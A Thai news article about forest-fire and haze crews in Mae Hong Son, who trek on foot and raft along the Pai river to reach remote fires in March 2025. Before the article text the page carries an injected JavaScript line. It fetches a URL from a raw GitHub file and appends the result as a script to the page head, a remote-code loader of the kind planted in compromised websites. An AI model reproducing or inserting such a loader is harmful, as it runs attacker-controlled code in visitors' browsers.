;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); แม่ฮ่องสอน ตามติดชีวิตคนดับไฟป่าและหมอกควันแม่ฮ่องสอนเกิดง่ายแต่ดับยาก - ThaiReference | อาสาไทยยืนยัน
แม่ฮ่องสอน ตามติดชีวิตคนดับไฟป่าและหมอกควันแม่ฮ่องสอนเกิดง่ายแต่ดับยาก

 ปัญหาหมอกควันและไฟป่าที่เกิดขึ้นในพื้นที่จังหวัดแม่ฮ่องสอน ที่ใครหลายคนมองว่าเป็นเรื่องของธรรมชาติหรือต้องพบเจอทุกปี แต่ที่ไม่ธรรมดาคือพฤติกรรมของจุดเกิดไฟที่ทำให้คนดับไฟป่าต้องใช้ทุกวิถีทางให้ไฟดับหรือลดลงให้ได้มากที่สุด ในส่วนของเขตรักษาพันธุ์สัตว์ป่าลุ่มน้ำปาย จังหวัดแม่ฮ่องสอน ที่รับผิดชอบพื้นที่ตั้งแต่ต้นน้ำที่ในอำเภอปาย ยาวผ่านอำเภอปางมะผ้าและต่อเนื่องจนสิ้นสุดลุ่มน้ำที่ในพื้นที่ของอำเภอเมืองแม่ฮ่องสอนนั้น นายนิกร แก้วโมรา หัวหน้าฯ ได้ร่วมกำหนดแผนกับชุดเสือไฟทั้งในพื้นที่และที่เดินทางมาร่วมปฏิบัติการจากหลายจังหวัด เพื่อหาแนวทางทางเข้าจัดการกับจุดเกิดไฟที่เข้าถึงยาก สูงชันหรือในพื้นที่ป่าลึก ประสานงานร่วมกับชุดดับไฟจากทุกหน่วยใช้กำลังของพนักงานจ้างชุดดับไฟป่าเข้าทำงานร่วมกัน

โดยเฉพาะในห้วงสัปดาห์นี้ที่พบว่ามีปริมาณจุดเกิดไฟเพิ่มสูงขึ้นอย่างผิดปกติ จนส่งผลให้สภาพอากาศย่ำแย่ติดต่อกันมาหลายวัน ที่นอกจากชุดดับไฟปกติจะเข้าจัดการกับไฟตามแนวเขตทางหรือตามแนวที่เข้าถึงได้ก่อนแล้ว ชุดของเขตรักษาพันธุ์สัตว์ป่าลุ่มน้ำปายนั้นจะเน้นไปยังพื้นที่เข้าถึงยาก ด้วยการสำรวจจุดเกิดไฟจากดาวเทียมหรือการใช้โดรนทำการบินสำรวจ จากนั้นถึงทำการแบ่งชุดเข้าดำเนินการทั้งทางบกและทางน้ำ ซึ่งพนักงานจ้างนั้นจะมีศักยภาพที่สำคัญอีกอย่างคือการล่องเรือยาง เข้าดับไฟตลอดแนวลุ่มน้ำปายตลอดทั้งแนว ที่บางครั้งต้องใช้เวลาหลายวัน ด้วยการล่องเรือสำรวจ ชี้เป้าและเข้าดับไฟ ขยับแนวการปฏิบัติเข้าไปหาชุดที่เดินเท้าจากทางบก ซึ่งผลการดำเนินการในครั้งนี้สามารถเข้าถึงจุดเกิดไฟได้มากขึ้นและสามารถดับไฟลงได้อย่างเห็นผล ที่จะเห็นได้จากค่าตรวจวัดคุณภาพอากาศหรือ PM 2.5 ของจังหวัดแม่ฮ่องสอนที่สูงขึ้นราว 2 วัน ก็เริ่มลดลง และจากแผนในครั้งนี้จะยังคงเดินหน้าต่อไปจนกว่าจะสิ้นสุดหรือแน่ใจแล้วว่าควบคุมสถานการณ์ได้ โดยจะพบว่าในปีนี้แม่ฮ่องสอนยังไม่ประกาศใช้อากาศยานหรือ ฮ.เข้าช่วยดับไฟแต่อย่างใด  แผนเข้าตลุยไฟที่ผ่านมาหนักมาก โดยเฉพาะบริเวณป่าบ้านห้วยซลอบ  ต.ห้วย อ.เมือง จ.แม่ฮ่องสอน จำนวนหลายจุดและไม่มีท่าทีว่าจะลดลง จึงได้จัดกำลังพล จนท. ชุดศูนย์ปฏิบัติการควบคุมไฟป่าอุบลราชธานี จำนวน 8 นาย และ จนท.จุดสกัดห้วยซลอบ 2 นายเป็นเจ้าหน้าที่นำทาง โดยเริ่มปฏิบัติการตั้งแต่ เช้าวันที่ 16 มีนาคม 2568 โดยการเดินเท้าพร้อมสัมภาระและอุปกรณ์เครื่องมือดับไฟป่า

คณะเจ้าหน้าที่ เริ่มออกเดินทางจากฝายบ้านห้วยผา เดินเท้าเป็นระยะทาง 5 กม. นอนพักค้างแรมบริเวณป่าดอยปลายกริด เพื่อไปหาจุดความร้อนตามที่ได้รับแจ้ง เป็นระยะทาง 8 กม. แต่เนื่องจากกลุ่มไฟอยู่ในพื้นที่ลาดชันไม่สามารถเข้าดำเนินการดับไฟได้โดยตรง จึงได้ทำการ ทำแนวกันไฟยาวตามสันดอยปลายกริด ย้อนกลับมาทางห้วยไม้สะเป่ และพักค้างแรมบริเวณห้วยไม้สะเป่ คณะเจ้าหน้าที่ร่วมกันลงความเห็นว่า ไฟไหม้ป่าอยู่พื้นที่เขาสูงชัน เชื้อเพลิงมีปริมาณมากและ ลมแรง และเสบียงสำหรับ 3 คืน หมดต้องออกจากพื้นที่ไปจุดนัดพบแพยาง จึงร่วมกันออกเดินทางเป็นระยะทาง 6 กม. ถึงจุดนัดพบ ริมน้ำปาย และได้มีชุดเจ้าหน้าที่ชุด ลาดตระเวนเชิงคุณภาพชุดที่ 4 จำนวน 5 นาย และเจ้าหน้าที่ ศูนย์ปฏิบัติการควบคุมไฟป่าอุบลราชธานี จำนวน 5 นาย เพื่อมา สับเปลี่ยนกำลังพล ดับไฟป่า จนกระทั่งวันที่ 19 มีนาคม 2568 ชุดคณะเจ้าหน้าที่ ชุดอุบลราชธานี และจุดสกัดห้วยซลอบ  ร่วม 10 นาย ที่เข้าปฏิบัติภารกิจ 4วัน3 คืน  (ชุดแรก) ขณะนี้ได้ถอนกำลังออกจากพื้นที่ ถึง อช.น้ำตกแม่สุรินทร์ เป็นที่เรียบร้อย ปลอดภัยทุกนาย หากสถานการณ์ไฟป่า ยังมีความรุนแรงและต่อเนื่อง จะได้ส่ง จนท. ศูนย์ปฏิบัติการไฟป่านครราชสีมา เข้าร่วมภารกิจดับไฟป่า ต่อไป

วิรัตน์ นันทะพรพิบูลย์ จ.แม่ฮ่องสอน

[dsm_icon_divider use_icon=”on” font_icon=”||divi||400″ use_icon_font_size=”on” icon_font_size=”25px” divider_style=”dashed” _builder_version=”4.25.2″ _module_preset=”default” module_alignment=”center” global_colors_info=”{}”][/dsm_icon_divider]
[dsm_blog_carousel posts_number=”20″ posts_offset=”1″ include_categories=”3,5,4″ use_date=”off” use_category=”on” use_author=”off” use_readmore=”on” readmore_text=”อ่านเพิ่ม…” post_equal_height=”on” _builder_version=”4.25.2″ _module_preset=”default” title_font_size=”25px” min_height=”482px” custom_margin=”||639px||false|false” custom_padding=”||340px|||” global_colors_info=”{}”][/dsm_blog_carousel]